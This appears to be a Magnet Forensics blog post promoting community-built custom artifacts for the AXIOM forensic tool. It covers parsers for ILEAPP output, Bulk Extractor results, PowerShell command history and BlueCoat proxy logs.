Highlighting Some Custom Artifacts in the Artifact Exchange
The volume of digital data and the amount of applications available to users on Windows, MacOS, and mobile devices can be incredibly overwhelming. As such, commercial tools are understandably unable to keep up with the variety of new and updated applications when parsing your evidence sources. Additionally, in your forensic lab in your organization, you may be dealing with multiple sources of data on top of your forensic images, such as network logs, output from other forensics tools, etc. Luckily when using Magnet AXIOM, we’ve allowed for the ability to create, use, and share custom artifacts for those times when you come across data unsupported in AXIOM.
With custom artifacts, you can process unsupported data from your evidence to analyze alongside the hundreds of artifacts that AXIOM already supports! The Artifact Exchange on the Magnet Forensics Resource Center will provide you with details of how to create your own custom artifacts to equip and inspire you to write and share. You can write custom artifacts in either XML or Python, or simply use the Magnet Custom Artifact Generator (MCAG) which makes custom artifact creation somewhat effortless! But, you don’t have to create your own to utilize the already dozens of custom artifacts available in the Artifact Exchange. You can immediately download and utilize this collections of custom artifacts in your examinations, created by folks throughout the DFIR community, and we’re aiming to highlight just a few!
ILEAPP Parsing
One huge benefit of Custom Artifacts is the ability to utilize the output from other tools in your toolkit and review the data alongside AXIOM’s artifact support as well! Known in the DFIR community for his many contributions, Alexis Brignoni is also the largest contributor to the Artifact Exchange as well (thanks Alexis!). Among the many Custom Artifacts that he’s written and submitted over the years is the collection associated with the output from his own forensic parser, ILEAPP. Using these custom artifacts, you can now process the output from ILEAPP, allowing you to view and analyze Connected Devices, Account Data, Calendar Data, and more, all within AXIOM This is a great way to validate output from various tools easily within one user interface.
Bulk Extractor
Magnet’s own Jad Saliba provided a number of custom artifacts on the Artifact Exchange, most recently adding the ability to process Bulk Extractor output into AXIOM. If you’re familiar with Bulk Extractor, you may be aware that the output from Bulk Extractor is generated into a variety of text files, all of which can provide tons of useful data from your case. The Artifact Exchange has two custom artifacts to load these text files as an evidence source and give you a unified view of all the data output within AXIOM. This also allows you to sort, filter, and easily analyze all of the Bulk Extractor data. Just add the entire Bulk Extractor output folder as evidence, where the collection of text file output was saved to, and the custom artifacts written by Jad will appropriately run against the applicable files. AXIOM will also denote which Bulk Extractor text file the data was processed from, as seen in the screenshot below.
Powershell History
If you find yourself analyzing a Windows endpoint and need an artifact to show what commands were run in Powershell by a savvy user, you’re covered! Yogesh Khatri authored a custom artifact to parse the Powershell command history from the ConsoleHost_history.txt file. This can definitely provide insight into the activities of a user, and can be especially useful if they were utilizing Powershell for nefarious reasons.
BlueCoat Proxy Logs
Find yourself analyzing logs from various sources when a case arises? If you are dealing with BlueCoat Proxy Logs, don’t worry! Trey Amick has a custom artifact for you! Simply add your log evidence into your case and process this custom artifact for an easy way to view and analyze this log data.
Download and Submit Custom Artifacts at the Artifact Exchange
Hop on over to the Artifact Exchange today to download these and more custom artifacts for your examinations, written by the DFIR community, for the DFIR community! And don’t forget to submit your own custom artifacts that you’ve created for your own examinations. You never know who might need those results in their casework, and how far reaching your impact could be!